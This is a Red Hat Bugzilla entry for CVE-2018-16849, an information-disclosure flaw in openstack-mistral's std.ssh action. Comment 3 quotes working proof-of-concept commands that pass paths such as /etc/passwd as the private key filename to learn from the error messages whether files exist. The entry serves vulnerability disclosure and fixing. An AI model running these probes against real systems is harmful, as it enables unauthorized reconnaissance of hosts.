Bug 1645334 (CVE-2018-16849)

Summary: CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Product: [Other] Security Response Reporter: James Hebden <jhebden>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: apevec, chrisw, jjoyce, jschluet, lhh, lpeer, markmc, mburns, rbryant, sclewis, slinaber, tdecacqu, tvignaud
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: openstack-mistral 7.0.1, openstack-mistral 8.0.0.0b1 Doc Type: If docs needed, set a value
Doc Text:
An information-disclosure flaw was discovered in openstack-mistral, where the SSH private key filename of a std.ssh action could be manipulated. The flaw could be exploited to determine the presence of a file path on the host executing the std.ssh action, based on the returned error message.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2021-10-25 22:21:10 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1645350, 1645351, 1679103    
Bug Blocks: 1623055    

Description James Hebden 2018-11-02 01:12:48 UTC 
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.
Comment 1 James Hebden 2018-11-02 02:59:43 UTC 
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708
Comment 3 James Hebden 2018-11-02 03:31:36 UTC 
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}
Comment 6 Laura Pardo 2019-05-22 15:16:03 UTC 
Acknowledgments:

Name: the Mistral project